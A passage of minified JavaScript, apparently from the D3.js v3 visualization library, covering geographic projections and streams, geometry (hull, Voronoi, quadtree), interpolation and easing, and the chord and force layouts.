%Y",date:"%m/%d/%Y",time:"%H:%M:%S",periods:["AM","PM"],days:["Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday"],shortDays:["Sun","Mon","Tue","Wed","Thu","Fri","Sat"],months:["January","February","March","April","May","June","July","August","September","October","November","December"],shortMonths:["Jan","Feb","Mar","Apr","May","Jun","Jul","Aug","Sep","Oct","Nov","Dec"]});ta.format=gc.numberFormat,ta.geo={},ce.prototype={s:0,t:0,add:function(n){le(n,this.t,pc),le(pc.s,this.s,this),this.s?this.t+=pc.t:this.s=pc.t
},reset:function(){this.s=this.t=0},valueOf:function(){return this.s}};var pc=new ce;ta.geo.stream=function(n,t){n&&vc.hasOwnProperty(n.type)?vc[n.type](n,t):se(n,t)};var vc={Feature:function(n,t){se(n.geometry,t)},FeatureCollection:function(n,t){for(var e=n.features,r=-1,u=e.length;++r<u;)se(e[r].geometry,t)}},dc={Sphere:function(n,t){t.sphere()},Point:function(n,t){n=n.coordinates,t.point(n[0],n[1],n[2])},MultiPoint:function(n,t){for(var e=n.coordinates,r=-1,u=e.length;++r<u;)n=e[r],t.point(n[0],n[1],n[2])},LineString:function(n,t){fe(n.coordinates,t,0)},MultiLineString:function(n,t){for(var e=n.coordinates,r=-1,u=e.length;++r<u;)fe(e[r],t,0)},Polygon:function(n,t){he(n.coordinates,t)},MultiPolygon:function(n,t){for(var e=n.coordinates,r=-1,u=e.length;++r<u;)he(e[r],t)},GeometryCollection:function(n,t){for(var e=n.geometries,r=-1,u=e.length;++r<u;)se(e[r],t)}};ta.geo.area=function(n){return mc=0,ta.geo.stream(n,Mc),mc};var mc,yc=new ce,Mc={sphere:function(){mc+=4*qa},point:b,lineStart:b,lineEnd:b,polygonStart:function(){yc.reset(),Mc.lineStart=ge},polygonEnd:function(){var n=2*yc;mc+=0>n?4*qa+n:n,Mc.lineStart=Mc.lineEnd=Mc.point=b}};ta.geo.bounds=function(){function n(n,t){M.push(x=[s=n,h=n]),f>t&&(f=t),t>g&&(g=t)}function t(t,e){var r=pe([t*Da,e*Da]);if(m){var u=de(m,r),i=[u[1],-u[0],0],o=de(i,u);Me(o),o=xe(o);var c=t-p,l=c>0?1:-1,v=o[0]*Pa*l,d=ga(c)>180;if(d^(v>l*p&&l*t>v)){var y=o[1]*Pa;y>g&&(g=y)}else if(v=(v+360)%360-180,d^(v>l*p&&l*t>v)){var y=-o[1]*Pa;f>y&&(f=y)}else f>e&&(f=e),e>g&&(g=e);d?p>t?a(s,t)>a(s,h)&&(h=t):a(t,h)>a(s,h)&&(s=t):h>=s?(s>t&&(s=t),t>h&&(h=t)):t>p?a(s,t)>a(s,h)&&(h=t):a(t,h)>a(s,h)&&(s=t)}else n(t,e);m=r,p=t}function e(){b.point=t}function r(){x[0]=s,x[1]=h,b.point=n,m=null}function u(n,e){if(m){var r=n-p;y+=ga(r)>180?r+(r>0?360:-360):r}else v=n,d=e;Mc.point(n,e),t(n,e)}function i(){Mc.lineStart()}function o(){u(v,d),Mc.lineEnd(),ga(y)>Ca&&(s=-(h=180)),x[0]=s,x[1]=h,m=null}function a(n,t){return(t-=n)<0?t+360:t}function c(n,t){return n[0]-t[0]}function l(n,t){return t[0]<=t[1]?t[0]<=n&&n<=t[1]:n<t[0]||t[1]<n}var s,f,h,g,p,v,d,m,y,M,x,b={point:n,lineStart:e,lineEnd:r,polygonStart:function(){b.point=u,b.lineStart=i,b.lineEnd=o,y=0,Mc.polygonStart()},polygonEnd:function(){Mc.polygonEnd(),b.point=n,b.lineStart=e,b.lineEnd=r,0>yc?(s=-(h=180),f=-(g=90)):y>Ca?g=90:-Ca>y&&(f=-90),x[0]=s,x[1]=h}};return function(n){g=h=-(s=f=1/0),M=[],ta.geo.stream(n,b);var t=M.length;if(t){M.sort(c);for(var e,r=1,u=M[0],i=[u];t>r;++r)e=M[r],l(e[0],u)||l(e[1],u)?(a(u[0],e[1])>a(u[0],u[1])&&(u[1]=e[1]),a(e[0],u[1])>a(u[0],u[1])&&(u[0]=e[0])):i.push(u=e);for(var o,e,p=-1/0,t=i.length-1,r=0,u=i[t];t>=r;u=e,++r)e=i[r],(o=a(u[1],e[0]))>p&&(p=o,s=e[0],h=u[1])}return M=x=null,1/0===s||1/0===f?[[0/0,0/0],[0/0,0/0]]:[[s,f],[h,g]]}}(),ta.geo.centroid=function(n){xc=bc=_c=wc=Sc=kc=Ec=Ac=Nc=Cc=zc=0,ta.geo.stream(n,qc);var t=Nc,e=Cc,r=zc,u=t*t+e*e+r*r;return za>u&&(t=kc,e=Ec,r=Ac,Ca>bc&&(t=_c,e=wc,r=Sc),u=t*t+e*e+r*r,za>u)?[0/0,0/0]:[Math.atan2(e,t)*Pa,tt(r/Math.sqrt(u))*Pa]};var xc,bc,_c,wc,Sc,kc,Ec,Ac,Nc,Cc,zc,qc={sphere:b,point:_e,lineStart:Se,lineEnd:ke,polygonStart:function(){qc.lineStart=Ee},polygonEnd:function(){qc.lineStart=Se}},Lc=Le(Ne,Pe,je,[-qa,-qa/2]),Tc=1e9;ta.geo.clipExtent=function(){var n,t,e,r,u,i,o={stream:function(n){return u&&(u.valid=!1),u=i(n),u.valid=!0,u},extent:function(a){return arguments.length?(i=Ie(n=+a[0][0],t=+a[0][1],e=+a[1][0],r=+a[1][1]),u&&(u.valid=!1,u=null),o):[[n,t],[e,r]]}};return o.extent([[0,0],[960,500]])},(ta.geo.conicEqualArea=function(){return Ye(Ze)}).raw=Ze,ta.geo.albers=function(){return ta.geo.conicEqualArea().rotate([96,0]).center([-.6,38.7]).parallels([29.5,45.5]).scale(1070)},ta.geo.albersUsa=function(){function n(n){var i=n[0],o=n[1];return t=null,e(i,o),t||(r(i,o),t)||u(i,o),t}var t,e,r,u,i=ta.geo.albers(),o=ta.geo.conicEqualArea().rotate([154,0]).center([-2,58.5]).parallels([55,65]),a=ta.geo.conicEqualArea().rotate([157,0]).center([-3,19.9]).parallels([8,18]),c={point:function(n,e){t=[n,e]}};return n.invert=function(n){var t=i.scale(),e=i.translate(),r=(n[0]-e[0])/t,u=(n[1]-e[1])/t;return(u>=.12&&.234>u&&r>=-.425&&-.214>r?o:u>=.166&&.234>u&&r>=-.214&&-.115>r?a:i).invert(n)},n.stream=function(n){var t=i.stream(n),e=o.stream(n),r=a.stream(n);return{point:function(n,u){t.point(n,u),e.point(n,u),r.point(n,u)},sphere:function(){t.sphere(),e.sphere(),r.sphere()},lineStart:function(){t.lineStart(),e.lineStart(),r.lineStart()},lineEnd:function(){t.lineEnd(),e.lineEnd(),r.lineEnd()},polygonStart:function(){t.polygonStart(),e.polygonStart(),r.polygonStart()},polygonEnd:function(){t.polygonEnd(),e.polygonEnd(),r.polygonEnd()}}},n.precision=function(t){return arguments.length?(i.precision(t),o.precision(t),a.precision(t),n):i.precision()},n.scale=function(t){return arguments.length?(i.scale(t),o.scale(.35*t),a.scale(t),n.translate(i.translate())):i.scale()},n.translate=function(t){if(!arguments.length)return i.translate();var l=i.scale(),s=+t[0],f=+t[1];return e=i.translate(t).clipExtent([[s-.455*l,f-.238*l],[s+.455*l,f+.238*l]]).stream(c).point,r=o.translate([s-.307*l,f+.201*l]).clipExtent([[s-.425*l+Ca,f+.12*l+Ca],[s-.214*l-Ca,f+.234*l-Ca]]).stream(c).point,u=a.translate([s-.205*l,f+.212*l]).clipExtent([[s-.214*l+Ca,f+.166*l+Ca],[s-.115*l-Ca,f+.234*l-Ca]]).stream(c).point,n},n.scale(1070)};var Rc,Dc,Pc,Uc,jc,Fc,Hc={point:b,lineStart:b,lineEnd:b,polygonStart:function(){Dc=0,Hc.lineStart=Ve},polygonEnd:function(){Hc.lineStart=Hc.lineEnd=Hc.point=b,Rc+=ga(Dc/2)}},Oc={point:Xe,lineStart:b,lineEnd:b,polygonStart:b,polygonEnd:b},Ic={point:We,lineStart:Je,lineEnd:Ge,polygonStart:function(){Ic.lineStart=Ke},polygonEnd:function(){Ic.point=We,Ic.lineStart=Je,Ic.lineEnd=Ge}};ta.geo.path=function(){function n(n){return n&&("function"==typeof a&&i.pointRadius(+a.apply(this,arguments)),o&&o.valid||(o=u(i)),ta.geo.stream(n,o)),i.result()}function t(){return o=null,n}var e,r,u,i,o,a=4.5;return n.area=function(n){return Rc=0,ta.geo.stream(n,u(Hc)),Rc},n.centroid=function(n){return _c=wc=Sc=kc=Ec=Ac=Nc=Cc=zc=0,ta.geo.stream(n,u(Ic)),zc?[Nc/zc,Cc/zc]:Ac?[kc/Ac,Ec/Ac]:Sc?[_c/Sc,wc/Sc]:[0/0,0/0]},n.bounds=function(n){return jc=Fc=-(Pc=Uc=1/0),ta.geo.stream(n,u(Oc)),[[Pc,Uc],[jc,Fc]]},n.projection=function(n){return arguments.length?(u=(e=n)?n.stream||tr(n):y,t()):e},n.context=function(n){return arguments.length?(i=null==(r=n)?new $e:new Qe(n),"function"!=typeof a&&i.pointRadius(a),t()):r},n.pointRadius=function(t){return arguments.length?(a="function"==typeof t?t:(i.pointRadius(+t),+t),n):a},n.projection(ta.geo.albersUsa()).context(null)},ta.geo.transform=function(n){return{stream:function(t){var e=new er(t);for(var r in n)e[r]=n[r];return e}}},er.prototype={point:function(n,t){this.stream.point(n,t)},sphere:function(){this.stream.sphere()},lineStart:function(){this.stream.lineStart()},lineEnd:function(){this.stream.lineEnd()},polygonStart:function(){this.stream.polygonStart()},polygonEnd:function(){this.stream.polygonEnd()}},ta.geo.projection=ur,ta.geo.projectionMutator=ir,(ta.geo.equirectangular=function(){return ur(ar)}).raw=ar.invert=ar,ta.geo.rotation=function(n){function t(t){return t=n(t[0]*Da,t[1]*Da),t[0]*=Pa,t[1]*=Pa,t}return n=lr(n[0]%360*Da,n[1]*Da,n.length>2?n[2]*Da:0),t.invert=function(t){return t=n.invert(t[0]*Da,t[1]*Da),t[0]*=Pa,t[1]*=Pa,t},t},cr.invert=ar,ta.geo.circle=function(){function n(){var n="function"==typeof r?r.apply(this,arguments):r,t=lr(-n[0]*Da,-n[1]*Da,0).invert,u=[];return e(null,null,1,{point:function(n,e){u.push(n=t(n,e)),n[0]*=Pa,n[1]*=Pa}}),{type:"Polygon",coordinates:[u]}}var t,e,r=[0,0],u=6;return n.origin=function(t){return arguments.length?(r=t,n):r},n.angle=function(r){return arguments.length?(e=gr((t=+r)*Da,u*Da),n):t},n.precision=function(r){return arguments.length?(e=gr(t*Da,(u=+r)*Da),n):u},n.angle(90)},ta.geo.distance=function(n,t){var e,r=(t[0]-n[0])*Da,u=n[1]*Da,i=t[1]*Da,o=Math.sin(r),a=Math.cos(r),c=Math.sin(u),l=Math.cos(u),s=Math.sin(i),f=Math.cos(i);return Math.atan2(Math.sqrt((e=f*o)*e+(e=l*s-c*f*a)*e),c*s+l*f*a)},ta.geo.graticule=function(){function n(){return{type:"MultiLineString",coordinates:t()}}function t(){return ta.range(Math.ceil(i/d)*d,u,d).map(h).concat(ta.range(Math.ceil(l/m)*m,c,m).map(g)).concat(ta.range(Math.ceil(r/p)*p,e,p).filter(function(n){return ga(n%d)>Ca}).map(s)).concat(ta.range(Math.ceil(a/v)*v,o,v).filter(function(n){return ga(n%m)>Ca}).map(f))}var e,r,u,i,o,a,c,l,s,f,h,g,p=10,v=p,d=90,m=360,y=2.5;return n.lines=function(){return t().map(function(n){return{type:"LineString",coordinates:n}})},n.outline=function(){return{type:"Polygon",coordinates:[h(i).concat(g(c).slice(1),h(u).reverse().slice(1),g(l).reverse().slice(1))]}},n.extent=function(t){return arguments.length?n.majorExtent(t).minorExtent(t):n.minorExtent()},n.majorExtent=function(t){return arguments.length?(i=+t[0][0],u=+t[1][0],l=+t[0][1],c=+t[1][1],i>u&&(t=i,i=u,u=t),l>c&&(t=l,l=c,c=t),n.precision(y)):[[i,l],[u,c]]},n.minorExtent=function(t){return arguments.length?(r=+t[0][0],e=+t[1][0],a=+t[0][1],o=+t[1][1],r>e&&(t=r,r=e,e=t),a>o&&(t=a,a=o,o=t),n.precision(y)):[[r,a],[e,o]]},n.step=function(t){return arguments.length?n.majorStep(t).minorStep(t):n.minorStep()},n.majorStep=function(t){return arguments.length?(d=+t[0],m=+t[1],n):[d,m]},n.minorStep=function(t){return arguments.length?(p=+t[0],v=+t[1],n):[p,v]},n.precision=function(t){return arguments.length?(y=+t,s=vr(a,o,90),f=dr(r,e,y),h=vr(l,c,90),g=dr(i,u,y),n):y},n.majorExtent([[-180,-90+Ca],[180,90-Ca]]).minorExtent([[-180,-80-Ca],[180,80+Ca]])},ta.geo.greatArc=function(){function n(){return{type:"LineString",coordinates:[t||r.apply(this,arguments),e||u.apply(this,arguments)]}}var t,e,r=mr,u=yr;return n.distance=function(){return ta.geo.distance(t||r.apply(this,arguments),e||u.apply(this,arguments))},n.source=function(e){return arguments.length?(r=e,t="function"==typeof e?null:e,n):r},n.target=function(t){return arguments.length?(u=t,e="function"==typeof t?null:t,n):u},n.precision=function(){return arguments.length?n:0},n},ta.geo.interpolate=function(n,t){return Mr(n[0]*Da,n[1]*Da,t[0]*Da,t[1]*Da)},ta.geo.length=function(n){return Yc=0,ta.geo.stream(n,Zc),Yc};var Yc,Zc={sphere:b,point:b,lineStart:xr,lineEnd:b,polygonStart:b,polygonEnd:b},Vc=br(function(n){return Math.sqrt(2/(1+n))},function(n){return 2*Math.asin(n/2)});(ta.geo.azimuthalEqualArea=function(){return ur(Vc)}).raw=Vc;var Xc=br(function(n){var t=Math.acos(n);return t&&t/Math.sin(t)},y);(ta.geo.azimuthalEquidistant=function(){return ur(Xc)}).raw=Xc,(ta.geo.conicConformal=function(){return Ye(_r)}).raw=_r,(ta.geo.conicEquidistant=function(){return Ye(wr)}).raw=wr;var $c=br(function(n){return 1/n},Math.atan);(ta.geo.gnomonic=function(){return ur($c)}).raw=$c,Sr.invert=function(n,t){return[n,2*Math.atan(Math.exp(t))-Ra]},(ta.geo.mercator=function(){return kr(Sr)}).raw=Sr;var Bc=br(function(){return 1},Math.asin);(ta.geo.orthographic=function(){return ur(Bc)}).raw=Bc;var Wc=br(function(n){return 1/(1+n)},function(n){return 2*Math.atan(n)});(ta.geo.stereographic=function(){return ur(Wc)}).raw=Wc,Er.invert=function(n,t){return[-t,2*Math.atan(Math.exp(n))-Ra]},(ta.geo.transverseMercator=function(){var n=kr(Er),t=n.center,e=n.rotate;return n.center=function(n){return n?t([-n[1],n[0]]):(n=t(),[n[1],-n[0]])},n.rotate=function(n){return n?e([n[0],n[1],n.length>2?n[2]+90:90]):(n=e(),[n[0],n[1],n[2]-90])},e([0,0,90])}).raw=Er,ta.geom={},ta.geom.hull=function(n){function t(n){if(n.length<3)return[];var t,u=Et(e),i=Et(r),o=n.length,a=[],c=[];for(t=0;o>t;t++)a.push([+u.call(this,n[t],t),+i.call(this,n[t],t),t]);for(a.sort(zr),t=0;o>t;t++)c.push([a[t][0],-a[t][1]]);var l=Cr(a),s=Cr(c),f=s[0]===l[0],h=s[s.length-1]===l[l.length-1],g=[];for(t=l.length-1;t>=0;--t)g.push(n[a[l[t]][2]]);for(t=+f;t<s.length-h;++t)g.push(n[a[s[t]][2]]);return g}var e=Ar,r=Nr;return arguments.length?t(n):(t.x=function(n){return arguments.length?(e=n,t):e},t.y=function(n){return arguments.length?(r=n,t):r},t)},ta.geom.polygon=function(n){return ya(n,Jc),n};var Jc=ta.geom.polygon.prototype=[];Jc.area=function(){for(var n,t=-1,e=this.length,r=this[e-1],u=0;++t<e;)n=r,r=this[t],u+=n[1]*r[0]-n[0]*r[1];return.5*u},Jc.centroid=function(n){var t,e,r=-1,u=this.length,i=0,o=0,a=this[u-1];for(arguments.length||(n=-1/(6*this.area()));++r<u;)t=a,a=this[r],e=t[0]*a[1]-a[0]*t[1],i+=(t[0]+a[0])*e,o+=(t[1]+a[1])*e;return[i*n,o*n]},Jc.clip=function(n){for(var t,e,r,u,i,o,a=Tr(n),c=-1,l=this.length-Tr(this),s=this[l-1];++c<l;){for(t=n.slice(),n.length=0,u=this[c],i=t[(r=t.length-a)-1],e=-1;++e<r;)o=t[e],qr(o,s,u)?(qr(i,s,u)||n.push(Lr(i,o,s,u)),n.push(o)):qr(i,s,u)&&n.push(Lr(i,o,s,u)),i=o;a&&n.push(n[0]),s=u}return n};var Gc,Kc,Qc,nl,tl,el=[],rl=[];Or.prototype.prepare=function(){for(var n,t=this.edges,e=t.length;e--;)n=t[e].edge,n.b&&n.a||t.splice(e,1);return t.sort(Yr),t.length},Qr.prototype={start:function(){return this.edge.l===this.site?this.edge.a:this.edge.b},end:function(){return this.edge.l===this.site?this.edge.b:this.edge.a}},nu.prototype={insert:function(n,t){var e,r,u;if(n){if(t.P=n,t.N=n.N,n.N&&(n.N.P=t),n.N=t,n.R){for(n=n.R;n.L;)n=n.L;n.L=t}else n.R=t;e=n}else this._?(n=uu(this._),t.P=null,t.N=n,n.P=n.L=t,e=n):(t.P=t.N=null,this._=t,e=null);for(t.L=t.R=null,t.U=e,t.C=!0,n=t;e&&e.C;)r=e.U,e===r.L?(u=r.R,u&&u.C?(e.C=u.C=!1,r.C=!0,n=r):(n===e.R&&(eu(this,e),n=e,e=n.U),e.C=!1,r.C=!0,ru(this,r))):(u=r.L,u&&u.C?(e.C=u.C=!1,r.C=!0,n=r):(n===e.L&&(ru(this,e),n=e,e=n.U),e.C=!1,r.C=!0,eu(this,r))),e=n.U;this._.C=!1},remove:function(n){n.N&&(n.N.P=n.P),n.P&&(n.P.N=n.N),n.N=n.P=null;var t,e,r,u=n.U,i=n.L,o=n.R;if(e=i?o?uu(o):i:o,u?u.L===n?u.L=e:u.R=e:this._=e,i&&o?(r=e.C,e.C=n.C,e.L=i,i.U=e,e!==o?(u=e.U,e.U=n.U,n=e.R,u.L=n,e.R=o,o.U=e):(e.U=u,u=e,n=e.R)):(r=n.C,n=e),n&&(n.U=u),!r){if(n&&n.C)return void(n.C=!1);do{if(n===this._)break;if(n===u.L){if(t=u.R,t.C&&(t.C=!1,u.C=!0,eu(this,u),t=u.R),t.L&&t.L.C||t.R&&t.R.C){t.R&&t.R.C||(t.L.C=!1,t.C=!0,ru(this,t),t=u.R),t.C=u.C,u.C=t.R.C=!1,eu(this,u),n=this._;break}}else if(t=u.L,t.C&&(t.C=!1,u.C=!0,ru(this,u),t=u.L),t.L&&t.L.C||t.R&&t.R.C){t.L&&t.L.C||(t.R.C=!1,t.C=!0,eu(this,t),t=u.L),t.C=u.C,u.C=t.L.C=!1,ru(this,u),n=this._;break}t.C=!0,n=u,u=u.U}while(!n.C);n&&(n.C=!1)}}},ta.geom.voronoi=function(n){function t(n){var t=new Array(n.length),r=a[0][0],u=a[0][1],i=a[1][0],o=a[1][1];return iu(e(n),a).cells.forEach(function(e,a){var c=e.edges,l=e.site,s=t[a]=c.length?c.map(function(n){var t=n.start();return[t.x,t.y]}):l.x>=r&&l.x<=i&&l.y>=u&&l.y<=o?[[r,o],[i,o],[i,u],[r,u]]:[];s.point=n[a]}),t}function e(n){return n.map(function(n,t){return{x:Math.round(i(n,t)/Ca)*Ca,y:Math.round(o(n,t)/Ca)*Ca,i:t}})}var r=Ar,u=Nr,i=r,o=u,a=ul;return n?t(n):(t.links=function(n){return iu(e(n)).edges.filter(function(n){return n.l&&n.r}).map(function(t){return{source:n[t.l.i],target:n[t.r.i]}})},t.triangles=function(n){var t=[];return iu(e(n)).cells.forEach(function(e,r){for(var u,i,o=e.site,a=e.edges.sort(Yr),c=-1,l=a.length,s=a[l-1].edge,f=s.l===o?s.r:s.l;++c<l;)u=s,i=f,s=a[c].edge,f=s.l===o?s.r:s.l,r<i.i&&r<f.i&&au(o,i,f)<0&&t.push([n[r],n[i.i],n[f.i]])}),t},t.x=function(n){return arguments.length?(i=Et(r=n),t):r},t.y=function(n){return arguments.length?(o=Et(u=n),t):u},t.clipExtent=function(n){return arguments.length?(a=null==n?ul:n,t):a===ul?null:a},t.size=function(n){return arguments.length?t.clipExtent(n&&[[0,0],n]):a===ul?null:a&&a[1]},t)};var ul=[[-1e6,-1e6],[1e6,1e6]];ta.geom.delaunay=function(n){return ta.geom.voronoi().triangles(n)},ta.geom.quadtree=function(n,t,e,r,u){function i(n){function i(n,t,e,r,u,i,o,a){if(!isNaN(e)&&!isNaN(r))if(n.leaf){var c=n.x,s=n.y;if(null!=c)if(ga(c-e)+ga(s-r)<.01)l(n,t,e,r,u,i,o,a);else{var f=n.point;n.x=n.y=n.point=null,l(n,f,c,s,u,i,o,a),l(n,t,e,r,u,i,o,a)}else n.x=e,n.y=r,n.point=t}else l(n,t,e,r,u,i,o,a)}function l(n,t,e,r,u,o,a,c){var l=.5*(u+a),s=.5*(o+c),f=e>=l,h=r>=s,g=h<<1|f;n.leaf=!1,n=n.nodes[g]||(n.nodes[g]=su()),f?u=l:a=l,h?o=s:c=s,i(n,t,e,r,u,o,a,c)}var s,f,h,g,p,v,d,m,y,M=Et(a),x=Et(c);if(null!=t)v=t,d=e,m=r,y=u;else if(m=y=-(v=d=1/0),f=[],h=[],p=n.length,o)for(g=0;p>g;++g)s=n[g],s.x<v&&(v=s.x),s.y<d&&(d=s.y),s.x>m&&(m=s.x),s.y>y&&(y=s.y),f.push(s.x),h.push(s.y);else for(g=0;p>g;++g){var b=+M(s=n[g],g),_=+x(s,g);v>b&&(v=b),d>_&&(d=_),b>m&&(m=b),_>y&&(y=_),f.push(b),h.push(_)}var w=m-v,S=y-d;w>S?y=d+w:m=v+S;var k=su();if(k.add=function(n){i(k,n,+M(n,++g),+x(n,g),v,d,m,y)},k.visit=function(n){fu(n,k,v,d,m,y)},k.find=function(n){return hu(k,n[0],n[1],v,d,m,y)},g=-1,null==t){for(;++g<p;)i(k,n[g],f[g],h[g],v,d,m,y);--g}else n.forEach(k.add);return f=h=n=s=null,k}var o,a=Ar,c=Nr;return(o=arguments.length)?(a=cu,c=lu,3===o&&(u=e,r=t,e=t=0),i(n)):(i.x=function(n){return arguments.length?(a=n,i):a},i.y=function(n){return arguments.length?(c=n,i):c},i.extent=function(n){return arguments.length?(null==n?t=e=r=u=null:(t=+n[0][0],e=+n[0][1],r=+n[1][0],u=+n[1][1]),i):null==t?null:[[t,e],[r,u]]},i.size=function(n){return arguments.length?(null==n?t=e=r=u=null:(t=e=0,r=+n[0],u=+n[1]),i):null==t?null:[r-t,u-e]},i)},ta.interpolateRgb=gu,ta.interpolateObject=pu,ta.interpolateNumber=vu,ta.interpolateString=du;var il=/[-+]?(?:\d+\.?\d*|\.?\d+)(?:[eE][-+]?\d+)?/g,ol=new RegExp(il.source,"g");ta.interpolate=mu,ta.interpolators=[function(n,t){var e=typeof t;return("string"===e?Ga.has(t)||/^(#|rgb\(|hsl\()/.test(t)?gu:du:t instanceof ot?gu:Array.isArray(t)?yu:"object"===e&&isNaN(t)?pu:vu)(n,t)}],ta.interpolateArray=yu;var al=function(){return y},cl=ta.map({linear:al,poly:ku,quad:function(){return _u},cubic:function(){return wu},sin:function(){return Eu},exp:function(){return Au},circle:function(){return Nu},elastic:Cu,back:zu,bounce:function(){return qu}}),ll=ta.map({"in":y,out:xu,"in-out":bu,"out-in":function(n){return bu(xu(n))}});ta.ease=function(n){var t=n.indexOf("-"),e=t>=0?n.slice(0,t):n,r=t>=0?n.slice(t+1):"in";return e=cl.get(e)||al,r=ll.get(r)||y,Mu(r(e.apply(null,ea.call(arguments,1))))},ta.interpolateHcl=Lu,ta.interpolateHsl=Tu,ta.interpolateLab=Ru,ta.interpolateRound=Du,ta.transform=function(n){var t=ua.createElementNS(ta.ns.prefix.svg,"g");return(ta.transform=function(n){if(null!=n){t.setAttribute("transform",n);var e=t.transform.baseVal.consolidate()}return new Pu(e?e.matrix:sl)})(n)},Pu.prototype.toString=function(){return"translate("+this.translate+")rotate("+this.rotate+")skewX("+this.skew+")scale("+this.scale+")"};var sl={a:1,b:0,c:0,d:1,e:0,f:0};ta.interpolateTransform=Hu,ta.layout={},ta.layout.bundle=function(){return function(n){for(var t=[],e=-1,r=n.length;++e<r;)t.push(Yu(n[e]));return t}},ta.layout.chord=function(){function n(){var n,l,f,h,g,p={},v=[],d=ta.range(i),m=[];for(e=[],r=[],n=0,h=-1;++h<i;){for(l=0,g=-1;++g<i;)l+=u[h][g];v.push(l),m.push(ta.range(i)),n+=l}for(o&&d.sort(function(n,t){return o(v[n],v[t])}),a&&m.forEach(function(n,t){n.sort(function(n,e){return a(u[t][n],u[t][e])})}),n=(La-s*i)/n,l=0,h=-1;++h<i;){for(f=l,g=-1;++g<i;){var y=d[h],M=m[y][g],x=u[y][M],b=l,_=l+=x*n;p[y+"-"+M]={index:y,subindex:M,startAngle:b,endAngle:_,value:x}}r[y]={index:y,startAngle:f,endAngle:l,value:(l-f)/n},l+=s}for(h=-1;++h<i;)for(g=h-1;++g<i;){var w=p[h+"-"+g],S=p[g+"-"+h];(w.value||S.value)&&e.push(w.value<S.value?{source:S,target:w}:{source:w,target:S})}c&&t()}function t(){e.sort(function(n,t){return c((n.source.value+n.target.value)/2,(t.source.value+t.target.value)/2)})}var e,r,u,i,o,a,c,l={},s=0;return l.matrix=function(n){return arguments.length?(i=(u=n)&&u.length,e=r=null,l):u},l.padding=function(n){return arguments.length?(s=n,e=r=null,l):s},l.sortGroups=function(n){return arguments.length?(o=n,e=r=null,l):o},l.sortSubgroups=function(n){return arguments.length?(a=n,e=null,l):a},l.sortChords=function(n){return arguments.length?(c=n,e&&t(),l):c},l.chords=function(){return e||n(),e},l.groups=function(){return r||n(),r},l},ta.layout.force=function(){function n(n){return function(t,e,r,u){if(t.point!==n){var i=t.cx-n.x,o=t.cy-n.y,a=u-e,c=i*i+o*o;if(c>a*a/d){if(p>c){var l=t.charge/c;n.px-=i*l,n.py-=o*l}return!0}if(t.point&&c&&p>c){var l=t.pointCharge/c;n.px-=i*l,n.py-=o*l}}return!t.charge}}function t(n){n.px=ta.event.x,n.py=ta.event.y,a.resume()}var e,r,u,i,o,a={},c=ta.dispatch("start","tick","end"),l=[1,1],s=.9,f=fl,h=hl,g=-30,p=gl,v=.1,d=.64,m=[],M=[];return a.tick=function(){if((r*=.99)<.005)return c.end({type:"end",alpha:r=0}),!0;var t,e,a,f,h,p,d,y,x,b=m.length,_=M.length;for(e=0;_>e;++e)a=M[e],f=a.source,h=a.target,y=h.x-f.x,x=h.y-f.y,(p=y*y+x*x)&&(p=r*i[e]*((p=Math.sqrt(p))-u[e])/p,y*=p,x*=p,h.x-=y*(d=f.weight/(h.weight+f.weight)),h.y-=x*d,f.x+=y*(d=1-d),f.y+=x*d);if((d=r*v)&&(y=l[0]/2,x=l[1]/2,e=-1,d))for(;++e<b;)a=m[e],a.x+=(y-a.x)*d,a.y+=(x-a.y)*d;if(g)for(Ju(t=ta.geom.quadtree(m),r,o),e=-1;++e<b;)(a=m[e]).fixed||t.visit(n(a));for(e=-1;++e<b;)a=m[e],a.fixed?(a.x=a.px,a.y=a.py):(a.x-=(a.px-(a.px=a.x))*s,a.y-=(a.py-(a.py=a.y))*s);c.tick({type:"tick",alpha:r})},a.nodes=function(n){return arguments.length?(m=n,a):m},a.links=function(n){return arguments.length?(M=n,a):M},a.size=function(n){return arguments.length?(l=n,a):l},a.linkDistance=function(n){return arguments.length?(f="function"==typeof n?n:+n,a):f},a.distance=a.linkDistance,a.linkStrength=function(n){return arguments.length?(h="function"==typeof n?n:+n,a):h},a.friction=function(n){return arguments.length?(s=+n,a):s},a.charge=function(n){return arguments.length?(g="function"==typeof n?n:+n,a):g},a.chargeDistance=function(n){return arguments.length?(p=n*n,a):Math.sqrt(p)},a.gravity=function(n){return arguments.length?(v=+n,a):v},a.theta=function(n){return arguments.length?(d=n*n,a):Math.sqrt(d)},a.alpha=function(n){return arguments.length?(n=+n,r?r=n>0?n:0:n>0&&(c.start({type:"start",alpha:r=n}),ta.timer(a.tick)),a):r},a.start=function(){function n(n,r){if(!e){for(e=new Array(c),a=0;c>a;++a)e[a]=[];for(a=0;s>a;++a){var u=M[a];e[u.source.index].push(u.target),e[u.target.index].push(u.source)}}for(var i,o=e[t],a=-1,l=o.length;++a<l;)if(!isNaN(i=o[a][n]))return i;return Math.random()*r}var t,e,r,c=m.length,s=M.length,p=l[0],v=l[1];for(t=0;c>t;++t)(r=m[t]).index=t,r.weight=0;for(t=0;s>t;++t)r=M[t],"number"==typeof r.source&&(r.source=m[r.source]),"number"==typeof r.target&&(r.target=m[r.target]),++r.source.weight,++r.target.weight;for(t=0;c>t;++t)r=m[t],isNaN(r.x)&&(r.x=n("x",p)),isNaN(r.y)&&(r.y=n("y",v)),isNaN(r.px)&&(r.px=r.x),isNaN(r.py)&&(r.py=r.y);if(u=[],"function"==typeof f)for(t=0;s>t;++t)u[t]=+f.call(this,M[t],t);else for(t=0;s>t;++t)u[t]=f;if(i=[],"function"==typeof h)for(t=0;s>t;++t)i[t]=+h.call(this,M[t],t);else for(t=0;s>t;++t)i[t]=h;if(o=[],"function"==typeof g)for(t=0;c>t;++t)o[t]=+g.call(this,m[t],t);else for(t=0;c>t;++t)o[t]=g;return a.resume()},a.resume=function(){return a.alpha(.1)},a.stop=function(){return a.alpha(0)},a.drag=function(){return e||(e=ta.behavior.drag().origin(y).on("dragstart.force",Xu).on("drag.force",t).on("dragend.force",$u)),arguments.length?void this.on("mouseover.force",Bu).on("mouseout.force",Wu).call(e):e},ta.rebind(a,c,"on")};var fl=20,hl=1,gl=1/0;ta.layout.hierarchy=function(){function n(u){var i,o=[u],a=[];for(u.depth=0;null!=(i=o.pop());)if(a.push(i),(l=e.call(n,i,i.depth))&&(c=l.length)){for(var c,l,s;--c>=0;)o.push(s=l[c]),s.parent=i,s.depth=i.depth+1;r&&(i.value=0),i.children=l}else r&&(i.value=+r.call(n,i,i.depth)||0),delete i.children;return Qu(u,function(n){var 